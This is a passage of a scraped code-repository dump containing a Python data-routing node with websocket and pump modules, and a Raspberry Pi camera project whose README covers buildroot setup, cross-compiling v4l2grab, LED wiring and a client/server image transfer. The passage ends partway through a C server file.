LOG.info('驱动 %s 设置基础配置成功' % driver_info.driver_name)\n return True\n\n # 驱动设置运行配置\n def __driver_set_run_config(self, driver_info):\n if driver_info.run_config:\n ret = driver_info.driver.set_run_config(driver_info.run_config,\n json.dumps(load_config(driver_info.run_config)))\n if not check_api_result(ret):\n LOG.error('驱动 %s 设置运行配置失败' % driver_info.driver_name)\n return False\n LOG.info('驱动 %s 设置运行配置成功' % driver_info.driver_name)\n return True\n\n # 驱动设置回调函数\n def __driver_set_call_back(self, driver_info):\n if driver_info.direction == 'down':\n if driver_info.sub_type == 'seq_sensor':\n # 设置下行连续回调\n ret = driver_info.driver.set_fun(self.__write_data_seq_sensor_down)\n elif driver_info.sub_type == 'seq_event':\n # 设置下行连续回调\n ret = driver_info.driver.set_fun(self.__write_data_seq_event_down)\n elif driver_info.sub_type in ('dis_sensor', 'dis_event'):\n # 设置下行离散回调\n ret = driver_info.driver.set_fun(self.__write_data_dis_down)\n else:\n if driver_info.sub_type is not None:\n LOG.error('驱动%s采集方式配置错误:%s' % (driver_info.driver_name, driver_info.sub_type))\n return False\n elif driver_info.direction == 'up':\n if driver_info.sub_type == 'seq_sensor':\n # 设置上行连续回调\n ret = driver_info.driver.set_fun(self.__write_data_seq_sensor_up)\n elif driver_info.sub_type == 'seq_event':\n # 设置上行连续回调\n ret = driver_info.driver.set_fun(self.__write_data_seq_event_up)\n elif driver_info.sub_type in ('dis_sensor', 'dis_event'):\n # 设置上行离散回调\n ret = driver_info.driver.set_fun(self.__write_data_dis_up)\n else:\n if driver_info.sub_type is not None:\n LOG.error('驱动%s采集方式配置错误:%s' % (driver_info.driver_name, driver_info.sub_type))\n return False\n else:\n LOG.error('驱动%s数据流向配置错误:%s' % (driver_info.driver_name, driver_info.direction))\n return False\n if not check_api_result(ret):\n LOG.error('设置 %s 回调失败' % driver_info.driver_name)\n return False\n LOG.info('设置 %s 回调成功' % driver_info.driver_name)\n return True\n\n # 关联pump,topic,driver\n def __pump_set_topic_driver(self, pump, topic_info, driver_info, cycle):\n pump.set_topic_info(topic_info.topic, topic_info.tags)\n pump.set_driver_info(driver_info.driver_name, driver_info.driver, topic_info.topic, cycle)\n\n # 发布泵配置\n def __pump_set_config(self, driver_info, topic_info, cycle):\n if driver_info.direction == 'down':\n if driver_info.pub_type in ('seq_sensor', 'seq_event'):\n # 设置下行连续泵\n self.__pump_set_topic_driver(self.m_pump_seq_down, topic_info, driver_info, cycle)\n elif driver_info.pub_type in ('dis_sensor', 'dis_event'):\n # 设置下行离散泵\n self.__pump_set_topic_driver(self.m_pump_dis_down, topic_info, driver_info, cycle)\n else:\n LOG.error('驱动 %s 发布方式配置错误:%s' % (driver_info.driver_name, driver_info.pub_type))\n return False\n elif driver_info.direction == 'up':\n if driver_info.pub_type in ('seq_sensor', 'seq_event'):\n # 设置上行连续泵\n self.__pump_set_topic_driver(self.m_pump_seq_up, topic_info, driver_info, cycle)\n elif driver_info.pub_type in ('dis_sensor', 'dis_event'):\n # 设置上行离散泵\n self.__pump_set_topic_driver(self.m_pump_dis_up, topic_info, driver_info, cycle)\n else:\n LOG.error('驱动 %s 发布方式配置错误:%s' % (driver_info.driver_name, driver_info.pub_type))\n return False\n else:\n LOG.error('驱动 %s 数据流向配置错误:%s ' % (driver_info.driver_name, driver_info.direction))\n return False\n return True\n\n # 测试\n def __test(self):\n data = Data('tag1', 0, 192, int(time.time()), value_double=1.1)\n self.m_store_seq_down.put_data(data.tag, data)\n data = Data('tag2', 1, 192, int(time.time()), value_int64=8)\n self.m_store_seq_down.put_data(data.tag, data)\n data = Data('tag3', 2, 192, int(time.time()), value_string='hello')\n self.m_store_seq_down.put_data(data.tag, data)\n data = Data('tag4', 3, 192, int(time.time()), value_bytes=b'fuck')\n self.m_store_seq_down.put_data(data.tag, data)\n data = Data('tag10', 2, 192, int(time.time()), value_string='hello')\n self.m_store_dis_up.put_data(data)\n\n\nif __name__ == \"__main__\":\n m_core = Core()\n m_core.my_main()\n while True:\n time.sleep(1)\n" }, { "alpha_fraction": 0.5134376287460327, "alphanum_fraction": 0.5152426958084106, "avg_line_length": 29.968944549560547, "blob_id": "87bd83b44f69756e533ec0c4753a03285b5bc5e1", "content_id": "1d1144b3434e6a5eeaa8f0c1eef9906a250b0610", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5554, "license_type": "no_license", "max_line_length": 123, "num_lines": 161, "path": "/n_route/app/cfg.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: cfg.py\n@time: 2019/09/08\n@desc:\n\"\"\"\nimport json\nfrom share import LOG\nfrom share import load_config\nfrom share import Data_Mode_Dict, Data_dir_Dict\n\n\n# 基础配置\nclass BasicInfo:\n def __init__(self, server_name, server_version, server_desc, local_ip, local_port, sequence_max, discrete_max, domain):\n # 服务名称\n self.server_name = server_name\n # 服务版本号\n self.server_version = server_version\n # 服务描述\n self.server_desc = server_desc\n # 本机ip\n self.local_ip = local_ip\n # 本机端口号\n self.local_port = local_port\n # 数组最大缓存个数\n self.sequence_max = sequence_max\n # 队列最大缓存个数\n self.discrete_max = discrete_max\n # 数据域\n self.domain = domain\n\n\n# 驱动配置\nclass DriverInfo:\n def __init__(self, driver_name, lib_name, lib_type, basic_config, run_config, direction, sub_type, pub_type):\n # 驱动名称\n self.driver_name = driver_name\n # 驱动库名称\n self.lib_name = lib_name\n # 驱动编程语言\n self.lib_type = lib_type\n # 驱动基础配置文件\n self.basic_config = basic_config\n # 驱动运行配置文件\n self.run_config = run_config\n # 数据流向(采集为下:down, 发布为上:up)\n self.direction = direction\n # 订阅数据类型(seq_sensor:连续传感类数据;dis_sensor:离散传感类数据;dis_event:离散事件类数据)\n self.sub_type = sub_type\n # 发布数据类型(seq_sensor:连续传感类数据;dis_sensor:离散传感类数据;dis_event:离散事件类数据)\n self.pub_type = pub_type\n # 驱动对象\n self.driver = None\n\n\n# 主题配置\nclass TopicInfo:\n def __init__(self, topic, tags):\n # 发布主题\n self.topic = topic\n # 发布标签点\n self.tags = tags\n\n\n# 发布泵配置\nclass PumpInfo:\n def __init__(self, topic, driver, cycle):\n # 发布主题\n self.topic = topic\n # 发布驱动名称\n self.driver = driver\n # 发布周期\n self.cycle = cycle\n\n\n# 配置对象\nclass Cfg:\n def __init__(self):\n # 配置对象字典\n self.__cfg_msg = {}\n\n # 加载配置\n def load_cfg(self, cfg_name):\n try:\n self.__cfg_msg = load_config(cfg_name)\n except Exception as err:\n LOG.error('加载%s配置文件失败:%s' % (cfg_name, err))\n return False\n LOG.info('加载%s配置成功' % cfg_name)\n\n # 加载基础配置\n def get_basic_cfg(self):\n basic = BasicInfo(self.__cfg_msg['server_name'],\n self.__cfg_msg['server_version'],\n self.__cfg_msg['server_desc'],\n self.__cfg_msg['local_ip'],\n self.__cfg_msg['local_port'],\n self.__cfg_msg['sequence_max'],\n self.__cfg_msg['discrete_max'],\n self.__cfg_msg['domain'])\n return basic\n\n # 加载驱动配置\n def get_driver_cfg(self):\n drivers_dict = {}\n if 'driver' not in self.__cfg_msg:\n return drivers_dict\n driver_cfg = self.__cfg_msg['driver']\n for cfg in driver_cfg:\n driver = DriverInfo(cfg['driver_name'],\n cfg['lib_name'],\n cfg['lib_type'],\n cfg['basic_config'],\n cfg['run_config'],\n cfg['direction'],\n cfg['sub_type'],\n cfg['pub_type'])\n drivers_dict[driver.driver_name] = driver\n # 关键配置校验\n for driver in drivers_dict.values():\n if driver.direction not in Data_dir_Dict:\n LOG.error('驱动配置错误: %s: %s' % (driver.driver_name, driver.direction))\n if driver.sub_type and driver.sub_type not in Data_Mode_Dict:\n LOG.error('驱动配置错误: %s: %s' % (driver.driver_name, driver.sub_type))\n if driver.pub_type and driver.pub_type not in Data_Mode_Dict:\n LOG.error('驱动配置错误: %s: %s' % (driver.driver_name, driver.pub_type))\n return drivers_dict\n\n # 加载主题配置\n def get_topic_cfg(self):\n topics_dict = {}\n if 'topic' not in self.__cfg_msg:\n return topics_dict\n topic_cfg = self.__cfg_msg['topic']\n for cfg in topic_cfg:\n topic = TopicInfo(cfg['topic'], cfg['tags'])\n topics_dict[topic.topic] = topic\n return topics_dict\n\n # 加载发布配置\n def get_pump_cfg(self):\n pumps = []\n if 'pump' not in self.__cfg_msg:\n return pumps\n pump_cfg = self.__cfg_msg['pump']\n for cfg in pump_cfg:\n pump = PumpInfo(cfg['topic'], cfg['driver'], cfg['cycle'])\n pumps.append(pump)\n for pump in pumps:\n if pump.topic not in self.get_topic_cfg():\n LOG.error('发布泵配置错误: %s: %s' % (pump.driver, pump.topic))\n if pump.driver not in self.get_driver_cfg():\n LOG.error('发布泵配置错误: %s: %s' % (pump.driver, pump.topic))\n return pumps\n\n\nif __name__ == \"__main__\":\n print(\"hello world\")\n" }, { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 12, "blob_id": "40ac1cd1895697de00c60df4654f2805f246e0da", "content_id": "a58d61aa73d607c732912a23483dbcfa27eab601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "no_license", "max_line_length": 15, "num_lines": 2, "path": "/README.md", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "# n_route\n数据节点。用于数据的接入和转发\n" }, { "alpha_fraction": 0.5252880454063416, "alphanum_fraction": 0.5338801145553589, "avg_line_length": 28.773256301879883, "blob_id": "07b4ac4bd24452981912deeeffb053ebb54f1f63", "content_id": "d05db37868ff4b3f5f97e8b3b69e98b3f8932e9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5745, "license_type": "no_license", "max_line_length": 117, "num_lines": 172, "path": "/n_route/app/driver_websocket.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: driver_websocket.py\n@time: 2019/09/18\n@desc:\n\"\"\"\n\nimport json\nimport threading\nimport logging\nfrom websocket_server import WebsocketServer\nfrom share import sensor2dict, event2dict\nfrom share import RET_OK, RET_FAIL_PARAM, RET_FAIL_EXEC\n\n# 日志\nLOG = logging.getLogger('driver_websocket')\n# 驱动版本号\ndriver_version = 'v1.0'\n# 驱动名称\ndriver_name = 'driver_websocket.py'\n# 驱动描述\ndriver_desc = 'websocket驱动程序v1.0版本(20190918)'\n\n\nclass DataDriver:\n # 客户端信息\n class ClientInfo:\n def __init__(self, client, address):\n # 客户端对象\n self.client = client\n # 客户端地址\n self.address = address\n # 客户端订阅主题\n self.topic = ''\n\n def __init__(self):\n # 本地ip地址\n self.__host = ''\n # 本地端口号\n self.__port = 0\n # 数据模式:sensor(传感类数据);event(事件类数据)\n self.__model = ''\n # websocket服务器对象\n self.__web_server = None\n # 客户端字典\n self.__client_dict = {}\n # 组装数据函数字典\n self.__package = {'sensor': self.__package_sensor_data, 'event': self.__package_event_data}\n\n # 获取版本信息\n def get_version(self):\n return json.dumps({'code': 0, 'data': {'version': driver_version, 'name': driver_name, 'desc': driver_desc}})\n\n # 设置基础配置\n def set_basic_config(self, cfg_name, cfg_msg):\n # 解析配置\n try:\n cfg = json.loads(cfg_msg, encoding='utf-8')\n self.__host, self.__port, self.__model = cfg['host'], cfg['port'], cfg['model']\n except Exception as err:\n LOG.error('解析基础配置失败:%s' % (str(err),))\n return RET_FAIL_PARAM\n # 校验配置\n if self.__model not in ('sensor', 'event'):\n LOG.error('校验基础配置失败:%s' % self.__model)\n return RET_FAIL_PARAM\n LOG.info('设置基础配置成功')\n return RET_OK\n\n # 设置运行时配置\n def set_run_config(self, cfg_name, cfg_msg):\n # 无运行时配置,直接返回\n return RET_OK\n\n # 初始化\n def init(self):\n try:\n # 启动WebSocket服务\n self.__web_server = WebsocketServer(self.__port, self.__host)\n # 注册回调函数\n self.__web_server.set_fn_new_client(self.__new_client)\n self.__web_server.set_fn_client_left(self.__client_left)\n self.__web_server.set_fn_message_received(self.__msg_receive)\n # 创建WebSocket服务线程\n t1 = threading.Thread(target=self.__web_server.run_forever)\n t1.start()\n except Exception as err:\n LOG.error('初始化失败:%s' % (str(err),))\n return RET_FAIL_EXEC\n LOG.info('驱动初始化成功。创建websocket服务端:%s:%d' % (self.__host, self.__port))\n return RET_OK\n\n # 设置回调函数\n def set_fun(self, fun):\n # 无需回调,直接返回\n return RET_OK\n\n # 写入数据(对外发布数据)\n def write_data(self, data_info, data_list):\n try:\n # 解析data_info里的topic\n data_info = json.loads(data_info, encoding='utf-8')\n topic = data_info['topic']\n for info in self.__client_dict.values():\n if topic == info.topic:\n self.__web_server.send_message(info.client, self.__package_data(data_list))\n except Exception as err:\n LOG.error('发布数据失败:%s' % str(err))\n return RET_FAIL_EXEC\n return RET_OK\n\n # 启动运行\n def run(self):\n # 无需启动,直接返回\n return RET_OK\n\n # 停止运行\n def stop(self):\n # 无需停止,直接返回\n return RET_OK\n\n # 获取状态\n def get_state(self):\n state = 0x00000000\n return json.dumps({'code': 0, 'data': state})\n\n # ---------------------------------------内部实现---------------------------------------------\n # 新客户端连接\n def __new_client(self, client, server):\n if client:\n LOG.info(\"新的页面客户端连接: %d, %s\" % (client['id'], str(client['address'])))\n self.__client_dict[client['id']] = self.ClientInfo(client, client['address'])\n\n # 接收到页面请求\n def __msg_receive(self, client, server, message):\n if client:\n LOG.info(\"接收到页面%d请求:%s...\" % (client['id'], message[:100]))\n try:\n msg_dict = json.loads(message)\n topic = msg_dict['topic']\n self.__client_dict[client['id']].topic = topic\n except Exception:\n server.send_message(client, 'pong')\n\n # 页面离开\n def __client_left(self, client, server):\n if client:\n LOG.info('页面断开连接:%d, %s' % (client['id'], str(client['address'])))\n if client['id'] in self.__client_dict:\n self.__client_dict.pop(client['id'])\n\n # 组装数据\n def __package_data(self, data_list):\n return self.__package[self.__model](data_list)\n\n # 组装传感类数据\n def __package_sensor_data(self, data_list):\n datas = []\n for data in data_list:\n datas.append(sensor2dict(data))\n return json.dumps(datas)\n\n def __package_event_data(self, data_list):\n datas = []\n for data in data_list:\n datas.append(event2dict(data))\n return json.dumps(datas)\n\nif __name__ == \"__main__\":\n print(\"hello world\")\n" }, { "alpha_fraction": 0.46341463923454285, "alphanum_fraction": 0.46704021096229553, "avg_line_length": 28.314008712768555, "blob_id": "4fe4222af5f8df27f6a2d95ad18e14aabd55b536", "content_id": "ba3bbfd029ccf91d1a8cc226b21e976cad2f1ebc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7174, "license_type": "no_license", "max_line_length": 93, "num_lines": 207, "path": "/n_route/app/pump.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: pump.py\n@time: 2019/09/05\n@desc:\n\"\"\"\nimport json\nimport threading\nimport time\nfrom share import DEBUG\n\n\n# 发布连续数据\nclass PubSeq:\n # 驱动配置信息\n class __DriverInfo:\n def __init__(self, driver, topic, cycle):\n # 发布驱动\n self.driver = driver\n # 订阅主题\n self.topic = topic\n # 发布周期\n self.cycle = cycle\n # 发布计数器\n self.count = 0\n\n # 主题配置信息\n class __TopicInfo:\n # 主题功能待完善扩充\n def __init__(self, topic, tags):\n # 订阅主题\n self.topic = topic\n # 标签点集合\n self.tags = tags.split(',')\n # 索引位置集合\n self.indexs = []\n # 索引位置查找标识\n self.index_flag = False\n\n def __init__(self, data_store):\n # 数据源\n self.__data_store = data_store\n # 主题配置字典(供读取、筛选数据使用)\n self.__topic_dict = {}\n # 驱动配置字典(供发布数据使用)\n self.__driver_dict = {}\n # 数据域(接入节点发布数据时,需要添加数据域)\n self.__domain = ''\n # 创建发布数据线程\n self.__thread_pub = threading.Thread(target=self.__fun)\n # 启动发布数据线程\n self.__thread_pub.start()\n\n # 设置数据域\n def set_data_domain(self, domain):\n self.__domain = domain\n\n # 设置主题\n def set_topic_info(self, topic, tags):\n self.__topic_dict[topic] = self.__TopicInfo(topic, tags)\n\n # 设置驱动\n def set_driver_info(self, driver_name, driver, topic, cycle):\n # 驱动名称+发布主题\n key = driver_name + topic\n self.__driver_dict[key] = self.__DriverInfo(driver, topic, cycle)\n\n # 根据主题获取数据(待扩充完善)\n def __get_data_by_topic(self, topic_info):\n if topic_info.topic == 'all':\n # all主题,获取全部数据\n data_list = self.__data_store.get_data_all()\n else:\n # 其它主题,查找索引位置集合\n if not topic_info.index_flag:\n # 查询索引位置\n topic_info.indexs.clear()\n topic_info.index_flag = True\n for tag in topic_info.tags:\n # 根据tag查找index\n index = self.__data_store.get_index(tag)\n if index == -1:\n # 查找索引失败\n topic_info.index_flag = False\n topic_info.indexs.append(index)\n # 根据索引位置查找数据\n data_list = []\n for index in topic_info.indexs:\n data = self.__data_store.get_data(index)\n if data:\n # 读取到数据后添加到数组\n data_list.append(data)\n if len(self.__domain) > 0:\n # 如果存在数据域\n for data in data_list:\n # 对测点tag添加数据域\n data.tag = self.__domain + ':' + data.tag\n return data_list\n\n # 发布数据函数\n def __fun(self):\n while True:\n b_time = time.time()\n # 遍历所有驱动\n for info in self.__driver_dict.values():\n # 驱动达到发送周期\n if info.count == 0:\n # 查找驱动对应的主题配置\n topic_info = self.__topic_dict[info.topic]\n # 根据主题查找数据\n data_list = self.__get_data_by_topic(topic_info)\n # 驱动发送数据\n info.driver.write_data(json.dumps({'topic': info.topic}), data_list)\n # 计数器加1\n info.count += 1\n if info.count >= info.cycle:\n # 计数器达到发送周期时,计数器清零。触发发送数据\n info.count = 0\n # 每个轮询周期休眠1秒\n e_time = time.time()\n used_time = e_time - b_time\n if used_time < 1:\n time.sleep(1 - used_time)\n\n\n# 发布离散数据\nclass PubDis:\n # 驱动配置信息\n class __DriverInfo:\n def __init__(self, driver, topic):\n # 发布驱动\n self.driver = driver\n # 主题\n self.topic = topic\n\n # 主题配置信息\n class __TopicInfo:\n def __init__(self, topic, tags):\n # 主题\n self.topic = topic\n # 测点\n self.tags = tags.split(',')\n\n def __init__(self, data_store):\n # 数据源\n self.__data_store = data_store\n # 主题配置字典(供读取、筛选数据使用)\n self.__topic_dict = {}\n # 驱动配置字典(供发布数据使用)\n self.__driver_dict = {}\n # 数据域(接入节点发布数据时,需要添加数据域)\n self.__domain = ''\n # 创建发布数据线程\n self.__thread_pub = threading.Thread(target=self.__fun)\n # 启动发布数据线程\n self.__thread_pub.start()\n\n # 设置数据域\n def set_data_domain(self, domain):\n self.__domain = domain\n\n # 设置主题\n def set_topic_info(self, topic, tags=''):\n self.__topic_dict[topic] = self.__TopicInfo(topic, tags)\n\n # 设置驱动\n def set_driver_info(self, driver_name, driver, topic, cycle=0):\n # 驱动名称+发布主题\n key = driver_name + topic\n self.__driver_dict[key] = self.__DriverInfo(driver, topic)\n\n # 根据主题筛选数据(待扩充完善)\n def __get_data_by_topic(self, data, topic_info):\n if topic_info.topic == 'control':\n # all主题,返回全部数据\n return data\n else:\n # 目前对离散数据值过滤,只实现对传感类数据的标签点过滤\n try:\n if data.tag in topic_info.tags:\n return data\n else:\n return None\n except Exception:\n return None\n\n # 发布数据函数\n def __fun(self):\n while True:\n # 取出数据\n data = self.__data_store.get_data()\n if data:\n for info in self.__driver_dict.values():\n # 查找驱动对应的主题配置\n topic_info = self.__topic_dict[info.topic]\n # 根据主题对数据进行过滤\n out_data = self.__get_data_by_topic(data, topic_info)\n if out_data:\n if len(self.__domain) > 0:\n data.tag = self.__domain + '.' + data.tag\n # 驱动发送数据\n info.driver.write_data(json.dumps({'topic': info.topic}), [out_data])\n # 离散数据读数为阻塞方式\n if DEBUG:\n time.sleep(2)\n" } ]
10
AliMohamadi93/toe
https://github.com/AliMohamadi93/toe
2c2c401fb6456143262ab0e9517f0cb3f22417c5
c2941424c8560a26e61188a6f107517c530ad635
b4105e1ce59e4f2edf8cb024b0a3c40d0fc62d74
refs/heads/master
2021-01-08T11:52:26.102802
2020-02-21T00:18:12
2020-02-21T00:18:12
242,017,987
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.58203125, "alphanum_fraction": 0.59375, "avg_line_length": 27.55555534362793, "blob_id": "d48b9dbb2aaf3b203c813ba07a952699c0210f7c", "content_id": "0ad2195ff6ec23eb484c330d93b5557054a5e4cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 256, "license_type": "no_license", "max_line_length": 49, "num_lines": 9, "path": "/etoo.py", "repo_name": "AliMohamadi93/toe", "src_encoding": "UTF-8", "text": "def getBert(variable):\n word_array = (variable.lower()).split(\"bert\")\n print(word_array)\n if len(word_array) > 2:\n i = \"\".join(word_array[1])\n return i[::-1]\n else:\n return \"\"\nprint(getBert(\"abcdebertfcbarcelonabertabcde\"))" } ]
1
Bulowl/Camera_2019
https://github.com/Bulowl/Camera_2019
212a1aa4f5d29d6d73a54a68fbe9a7e5bf01f446
75ed0b0f7ed7b3f5cb8f04f5c58ad4958b3c5d81
057d5f5d20121e215f7c44b26b4a67b3f0bb08db
refs/heads/master
2020-12-05T23:01:44.860217
2020-02-02T18:48:26
2020-02-02T18:48:26
232,270,190
0
0
null
2020-01-07T07:39:24
2020-01-30T08:13:57
2020-01-30T09:34:59
C
[ { "alpha_fraction": 0.7002725005149841, "alphanum_fraction": 0.7220708727836609, "avg_line_length": 14.25, "blob_id": "4cebb5a9e978cbbfb053e651dd384bf68e550b3b", "content_id": "db4d43126cd434db43a9765dca3f41f637f449fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 367, "license_type": "no_license", "max_line_length": 72, "num_lines": 24, "path": "/project/src/readme.txt", "repo_name": "Bulowl/Camera_2019", "src_encoding": "UTF-8", "text": "Philibert ADAM B00826597\n\nTo compile, either run:\nmake \n\nor\n\ngcc -g -o client gameClient.c\ngcc -g -o client gameServer.c\n\nTo run:\n\nfor server:\n./server 'Ip address' 'port number'\n\nfor client:\n./client 'port number'\n\n\nPort number needs to be the same.\nTo run on the same computer, type 'localhost' instead of the IP address.\n\nValable inputs: s, p or r\nQuit option: q\n\n" }, { "alpha_fraction": 0.6831773519515991, "alphanum_fraction": 0.7215247750282288, "avg_line_length": 25.877300262451172, "blob_id": "d77eef349d3a8a3331bf9cda5fbf83df06fec574", "content_id": "49406b824536bc2f2fe8fa303d07747150c8ae42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4402, "license_type": "no_license", "max_line_length": 330, "num_lines": 163, "path": "/README.md", "repo_name": "Bulowl/Camera_2019", "src_encoding": "UTF-8", "text": "# Camera_2019\n\n\n### Préparation RPi3.\n\nOn commence par récupérer le docker :\n\n````\n$ docker pull pblottiere/embsys-rpi3-buildroot\n$ docker run -it pblottiere/embsys-rpi3-buildroot-video /bin/bash\n# cd /root\n# tar zxvf buildroot-precompiled-2017.08.tar.gz\n````\n\nOn récupère ensuite le fichier sdcard.img :\n\n```` shell\n$ docker cp <container_id>:/root/buildroot-precompiled-2017.08/output/images/sdcard.img .\n````\n\n et les fichiers start_x.elf et fixup_x.dat:\n\n```` shell\n$ docker cp <container_id>:/root/buildroot-precompiled-2017.08/output/build/rpi-firmware-685b3ceb0a6d6d6da7b028ee409850e83fb7ede7/boot/start_x.elf .\n$ docker cp <container_id>:/root/buildroot-precompiled-2017.08/output/build/rpi-firmware-685b3ceb0a6d6d6da7b028ee409850e83fb7ede7/boot/fixup_x.dat .\n````\n\nOn flash la carte SD avec sdcard.img : \n\n```` shell\n$ sudo dd if=sdcard.img of=/dev/mmXXX\n````\n\navec mmXXX qui est l'emplacement de la carte SD (peut etre retrouvé grace à la commande dmesg)\n\nOn copie les fichier start_x.elf et fixup_x.dat sur la partition 1 de la carte SD (la plus petite) via du drag and drop ou le terminal.\n\nOn ajoute les deux lignes au fichier config.txt\n\nstart_x=1\ngpu_mem=128\n\nCes deux lignes vont permettre à notre rasp de boot avec start_x.elf et fixup_x.dat.\n\n\n\nIl nous faut ensuite connaitre l'adresse IP de notre rasp afin de pouvoir s'y connecter en SSH (beaucoup plus simple et pratique). En s'y connectant via un connecteur serie (tx -> rx, rx -> tx et gnd -> gnd) et avec un terminal serie (gtkterm pour nous avec port USB0 et 115200 baud) on peut se connecter en tant que user/user1* .\nOn se met ensuite en root (su -> root1* ) pour faire la commande ifconfig afin d'avoir notre adresse IP (172.20.21.162).\n\nEn se connectant sur le même réseau que la rasp on peut maitenant 'faire du ssh'.\n\n\n```` shell\n$ ssh [email protected]\n# [email protected]'s password: user1*\n ````\n \n### Cross-compilation\n #### Cross-compilation de v4l2grab\n On compile v4l2grab avec arm-linux-gcc sur le docker. On obtient un exécutable compatible avec la rpi3.\n \n Installation des librairies \n```` shell\n$ apt-get update\n$ apt-get install libjpeg-dev libv4l-dev autoconf automake libtool\n ````\n \n Clone du repository\n```` shell\n$ git clone https://github.com/twam/v4l2grab.git\n$ cd v4l2grab\n ````\n \n Création fichiers autotools\n```` shell\n$ ./autogen.sh\n ````\n \n Ajout du path vers le compilateur\n\n```` shell\n$ export PATH=$PATH:/root/buildroot-precompiled-2017.08/output/host/usr/bin\n ````\n Configuration\n```` shell\n$ ./configure --host=arm-linux\n ````\n Commenter malloc dans le fichier configure.ac\n\n#AC_FUNC_MALLOC\n\nMake\n```` shell\n$ make\n$ make install\n```` \n #### Cross-compilation de client et serveur\nDans le dossier src:\n ```` shell\n$ docker cp clientserver_docker/ <container_id>:/root/buildroot-precompiled-2017.08\n```` \nDans le docker <container_id>:\n ```` shell\n$ cd /root/buildroot-precompiled-2017.08/clientserver_docker\n$ make\n```` \nDans le dossier src:\n ```` shell\n$ docker cp <container_id>:/root/buildroot-precompiled-2017.08/clientserver_docker .\n```` \n\n### Branchement LEDs\nbranchement des leds:\n<p align=\"center\">\n <img src=\"https://github.com/pblottiere/embsys/blob/master/labs/rpi3/imgs/led_res.jpg\" width=\"350\" title=\"Github Logo\">\n</p>\n\ndéclarer les GPIO correspondant aux leds:\n```` shell\n$ cd /sys/class/gpio\n$ echo <gpio_pin> > export\n````\nOn peut tester les Pin grace à:\n```` shell\n$ cd gpio<gpio_pin>\n$ echo 1 > value\n````\n\n### Install Camera\n\nlien du [tuto](https://www.dexterindustries.com/howto/installing-the-raspberry-pi-camera/)\n\nOn doit faire cet commande sur la raspberry pi\n```` shell\n$ modprobe bcm2835-v4l2\n````\nVerifier qu'elle soit bien installée:\n```` shell\n$ ls /dev/video0\n/dev/video0\n````\n\n### Prendre un photo\nPour prendre une photo avec la camera il suffit de lancer la commande:\n````shell\n$./v4l2grab -h\n````\nIl ne reste plus qu'a choisir les différentes options que l'on veut mettre\n\n### Client Server\n\nLancer le server (depuis la raspberry pi):\n```` shell\n$ cd /home/user/clientserver_docker\n$ ./server <port> <pathToTheImageFolder>\n````\n\nLancer le client (depuis le pc):\n```` shell\n$ cd <pathToTheFolderclientserver_docker>\n$ ./client <server_IP> <port> <\"image_extension\">\n````\n<\"image_extension\"> est optionnel, si il n'est pas renseigné, le mode intéractif est lancé et on choisit alors le format des images que l'on veut récupérer.\n" }, { "alpha_fraction": 0.7461538314819336, "alphanum_fraction": 0.7461538314819336, "avg_line_length": 17.571428298950195, "blob_id": "fb33d4696ec6fe87c9f456dee951468242f47a50", "content_id": "8f381e127da1095886342f91402d83188b39aa09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 130, "license_type": "no_license", "max_line_length": 30, "num_lines": 7, "path": "/project/src/makefile", "repo_name": "Bulowl/Camera_2019", "src_encoding": "UTF-8", "text": "default: server client\n\nclient: gameClient.c \n\tgcc -g -o client gameClient.c\n\nserver: gameServer.c\n\tgcc -g -o server gameServer.c\n" }, { "alpha_fraction": 0.574391782283783, "alphanum_fraction": 0.594366192817688, "avg_line_length": 17.205127716064453, "blob_id": "94558d469c44d12e64e4d8794fc45da54399f0ae", "content_id": "2be76ce21c9ae9fbab4bf120f94bfc414cc1c4bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 7810, "license_type": "no_license", "max_line_length": 82, "num_lines": 429, "path": "/project/src/new/server.c", "repo_name": "Bulowl/Camera_2019", "src_encoding": "UTF-8", "text": "/*\n Server finds images in directory.\n Creates entries into catalog.csv.\n Waits for clients.\n Responds to requests.\n*/\n\n\n/****Necessary includes****/\n#include \"md5sum.h\"\n#include <stdlib.h>\n#include <string.h>\n#include <sys/socket.h>\n#include <arpa/inet.h>\n#include <stdio.h>\n#include <unistd.h>\n#include <errno.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <dirent.h>\n#include <sys/sendfile.h>\n#include <fcntl.h>\n\n\n/*****Required global variables****/\nchar* logpath;\nchar* jpeg_array[200];\n\nint jpeg_count = 0;\n\nchar* file_array[200];\nchar* file_sizes[200];\nint file_count = 0;\n\n/**********Define for GPIO (led control*************/\n#define IN 0\n#define OUT 1\n\n#define LOW 0\n#define HIGH 1\n\n#define PINCONNECT 17 /* P1-18 */\n#define PINTRANSFER 18 /* P1-07 */\n\n/**********GPIO Function************/\n\nstatic int\nGPIOExport(int pin)\n{\n#define BUFFER_MAX 3\n\tchar buffer[BUFFER_MAX];\n\tssize_t bytes_written;\n\tint fd;\n\n\tfd = open(\"/sys/class/gpio/export\", O_WRONLY);\n\tif (-1 == fd) {\n\t\tfprintf(stderr, \"Failed to open export for writing!\\n\");\n\t\treturn(-1);\n\t}\n\n\tbytes_written = snprintf(buffer, BUFFER_MAX, \"%d\", pin);\n\twrite(fd, buffer, bytes_written);\n\tclose(fd);\n\treturn(0);\n}\n\nstatic int\nGPIOUnexport(int 